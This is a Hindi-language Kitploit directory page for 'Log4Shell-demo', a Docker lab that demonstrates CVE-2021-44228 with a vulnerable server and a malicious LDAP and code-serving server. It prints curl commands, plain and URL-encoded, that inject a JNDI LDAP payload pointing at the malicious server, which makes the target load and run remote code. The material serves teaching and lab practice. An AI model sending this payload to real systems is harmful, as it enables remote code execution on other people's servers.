Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Log4Shell-demo — यह डेमो दिखाता है कि Log4Shell / CVE-2021-44228 भेद्यता कैसे काम करती है | Kitploit
उपकरण/GitHubGitHub/mschmnet/log4shell-demo
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubmschmnet/log4shell-demo

Log4Shell-demo

यह डेमो दिखाता है कि Log4Shell / CVE-2021-44228 भेद्यता कैसे काम करती है

रिपॉजिटरी देखें
7114 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Log4Shell कार्य में

यह प्रोजेक्ट यह प्रदर्शित करने के उद्देश्य से है कि Log4Shell / CVE-2021-44228 कमजोरी कैसे काम करती है।

आवश्यकताएँ

आपको केवल Docker इंस्टॉल होना आवश्यक है। आदर्श रूप से आपके पास दो अलग-अलग वर्चुअल मशीनें हों। एक असुरक्षित सर्वर के लिए और एक दुर्भावनापूर्ण सर्वर के लिए, जो दुर्भावनापूर्ण कोडबेस और एक LDAP सर्वर होस्ट करेगा।

वैकल्पिक रूप से आपके पास Make और Docker Compose इंस्टॉल हो सकते हैं, लेकिन यह आवश्यक नहीं है क्योंकि इस repo में एक make.sh भी शामिल है जो इन आवश्यकताओं को छोड़कर उन्हें docker कंटेनर के भीतर से उपयोग करने की सुविधा देता है।

Docker इंस्टॉल करें (वैकल्पिक)

यदि आपने पहले से नहीं किया है, तो Debian VM पर Docker इंस्टॉल करने के चरण यहाँ दिए गए हैं। आप इन चरणों का उपयोग कर सकते हैं: https://gist.github.com/mschmnet/5d8c979920801c73e148c901a5989b46

रिपॉजिटरी डाउनलोड करें

root@kitploit:~
git clone [email protected]:mschmnet/Log4Shell-demo.git 

असुरक्षित सर्वर इंस्टॉल करें

root@kitploit:~
cd vulnerable-server
../make.sh run # Or you coud execute make run if you hade Make and Docker Compose installed

दुर्भावनापूर्ण सर्वर प्रारंभ करें

यह दुर्भावनापूर्ण Java क्लासेज़ को सर्व करने के लिए एक बुनियादी LDAP सर्वर और बुनियादी Python सर्वर प्रारंभ करेगा।

आपको IP पता या डोमेन नाम प्रदान करना होगा जहाँ ये सर्वर उपलब्ध होंगे।

root@kitploit:~
cd malicious-server
../make.sh run CODEBASE_URL=SERVER_IP_OR_DOMAIN_NAME # Optionally make instead of ../make.sh if you had Make and Docker Compose installed

लक्षित सर्वर पर हमला कैसे करें

root@kitploit:~
curl -X GET -G --data-urlencode 'foo=${jndi:ldap://IP_OR_DOMAIN_MALICIOUS_SERVER:1389/a}' http://IP_OR_DOMAIN_VULNERABLE_SERVER/some-endpoint

या केवल

root@kitploit:~
curl --location --request GET 'http://IP_OR_DOMAIN_VULNERABLE_SERVER/some-endpoint?foo=%24%7Bjndi%3Aldap%3A%2F%2FIP_OR_DOMAIN_MALICIOUS_SERVER%3A1389%2Fa%7D'

जहाँ ${jndi:ldap://IP_OR_DOMAIN_MALICIOUS_SERVER:1389/a} केवल URL एन्कोडेड है।

इनमें से किसी को कैसे रोकें

root@kitploit:~
../make.sh stop

लॉग्स कैसे देखें

root@kitploit:~
../make.sh logs 

स्लाइड्स

https://raw.githubusercontent.com/mschmnet/Log4Shell-demo/main/pdf/slides.pdf

टूल डाउनलोड करें